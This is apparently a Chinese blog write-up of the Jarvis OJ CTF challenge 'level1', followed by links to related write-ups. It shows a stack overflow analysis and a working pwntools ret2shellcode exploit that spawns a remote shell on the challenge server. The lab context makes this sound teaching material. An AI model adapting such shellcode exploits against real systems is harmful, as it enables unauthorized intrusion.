[Jarvis OJ - PWN]——[XMAN]level1

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:

    先checksec一下,什么保护都没有开。32位程序。

    看看IDA,找到了可以利用的栈溢出的read函数.


    开开心心的去找system函数.找了半天没找到,同时也没有/bin/sh字符串

    并且这道题什么保护都没开,应该是ret2shellcode的pwn题.buff2的地址题目给输出了出来.所以
    exp:
from pwn import *
p = remote("pwn2.jarvisoj.com", 9877)
shellcode = asm(shellcraft.sh()).ljust(0x88,"\x00") # 可以理解为system("/bin/sh")
ret_addr = p.recvline()[14: -2]
ret_addr = int(ret_addr, 16)
payload = shellcode + "a"*(0x4) + p32(ret_addr)
p.sendline(payload)
p.interactive()

[Jarvis OJ - PWN]——[XMAN]level1相关推荐

  1. [Jarvis OJ - PWN]——[XMAN]level4

    [Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...

  2. [Jarvis OJ - PWN]——[XMAN]level3_x64

    [Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...

  3. [Jarvis OJ - PWN]——[XMAN]level3

    [Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...

  4. [Jarvis OJ - PWN]——[XMAN]level2(x64)

    [Jarvis OJ - PWN]--[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序. ...

  5. [Jarvis OJ - PWN]——[XMAN]level0

    [Jarvis OJ - PWN]--[XMAN]level0 题目地址:https://www.jarvisoj.com/challenges 题目: checksec看看,64位,开启了NX保护 ...

  6. [Jarvis OJ - PWN]——[XMAN]level2

    [Jarvis OJ - PWN]--[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下.32位并且没有开启 ...

  7. [Jarvis OJ - PWN]——Typo(内涵peak小知识)

    [Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...

  8. [Jarvis OJ - PWN]——Backdoor

    [Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...

  9. [Jarvis OJ - PWN]——[61dctf]fm

    [Jarvis OJ - PWN]--[61dctf]fm 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下, 开启了canary ...

最新文章

  1. unity镜像_通过镜像学习Unity Multiplayer Basics
  2. dbutility mysql_c# 数据库通用类DbUtility
  3. ASP.NET Core on K8s学习之旅(14)Ingress灰度发布
  4. [密码学基础][每个信息安全博士生应该知道的52件事][Bristol52]42蒙哥马利乘法,哪里泄漏侧信道路吗?
  5. Ionic3 环境搭建以及基础配置实现(更新中)
  6. linux隐藏tomcat版本_Ubuntu 14.04隐藏Tomcat-7.0.52的版本号与操作系统类型
  7. 【Java数据结构与算法】第十二章 哈夫曼树和哈夫曼编码
  8. matlab的annotation,科学网—annotation in matlab Graph - 夏靖的博文
  9. python数据录入_Re:从零开始的Python数据分析(实战篇)
  10. 【大数据部落】基于LDA主题模型聚类的商品评论文本挖掘
  11. 西门子博图编程:使用S7-1500冗余PLC 建立ModbusTCP通信
  12. 计算机硬盘容量减少修复,硬盘容量丢失的修复方法
  13. pandas库的使用
  14. SRA数据下载(通过EBI-ENA数据库,使用ASpera)
  15. 降薪潮、裁员潮,普通IT数据人的30岁没电视剧里那么容易
  16. Nginx服务器支持.htaccess的方法
  17. 第十三届蓝桥杯EDA赛项国奖心得分享
  18. 大数的溢出,正溢出和负溢出
  19. IBM小型机AIX操作系统总结01--基础知识
  20. 数据结构与算法(java):树的基本概述

热门文章

  1. Page_Load Page_Init方法使用原理(转)
  2. LeetCode Algorithm 274. H 指数
  3. 111. Minimum Depth of Binary Tree 二叉树的最小深度
  4. Java二分查找、折半查找
  5. 适用于android 4.0以上版本的子线程网络图片查看器
  6. 【STM32】RTC程序示例
  7. 【Linux】一步一步学Linux——seq命令(221)
  8. 【C++】 C++标准模板库(六) Queue
  9. Android开发文章推荐
  10. python日历函数_python 怎么定义一个函数,输出日历